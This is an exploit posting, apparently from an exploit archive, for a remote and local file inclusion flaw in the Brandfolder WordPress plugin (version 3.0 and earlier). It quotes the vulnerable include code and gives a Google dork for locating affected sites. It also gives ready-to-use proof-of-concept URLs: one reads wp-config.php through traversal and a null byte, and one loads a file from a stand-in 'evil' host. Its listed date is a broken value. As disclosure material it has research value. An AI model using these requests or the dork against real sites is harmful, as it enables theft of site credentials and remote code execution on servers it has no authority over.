WordPress Brandfolder 3.0 Remote / Local File Inclusion
Posted on 30 November -0001
<HTML><HEAD><TITLE>WordPress Brandfolder 3.0 Remote / Local File Inclusion</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: Wordpress brandfolder plugin / RFI & LFI # Google Dork: inurl:wp-content/plugins/brandfolder # Date: 03/22/2016 # Exploit Author: AMAR^SHG # Vendor Homepage: https://brandfolder.com # Software Link: https://wordpress.org/plugins/brandfolder/ # Version: <=3.0 # Tested on: WAMP / Windows I-Details The vulnerability occurs at the first lines of the file callback.php: <?php ini_set('display_errors',1); ini_set('display_startup_errors',1); error_reporting(-1); require_once($_REQUEST['wp_abspath'] . 'wp-load.php'); require_once($_REQUEST['wp_abspath'] . 'wp-admin/includes/media.php'); require_once($_REQUEST['wp_abspath'] . 'wp-admin/includes/file.php'); require_once($_REQUEST['wp_abspath'] . 'wp-admin/includes/image.php'); require_once($_REQUEST['wp_abspath'] . 'wp-admin/includes/post.php'); $_REQUEST is based on the user input, so as you can guess, an attacker can depending on the context, host on a malicious server a file called wp-load.php, and disable its execution using an htaccess, or abuse the null byte character ( %00, %2500 url-encoded) II-Proof of concept http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=LFI/RFI http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=http://evil/ Discovered by AMAR^SHG (aka kuroi'sh). Greetings to RxR & Nofawkx Al & HolaKo </BODY></HTML>
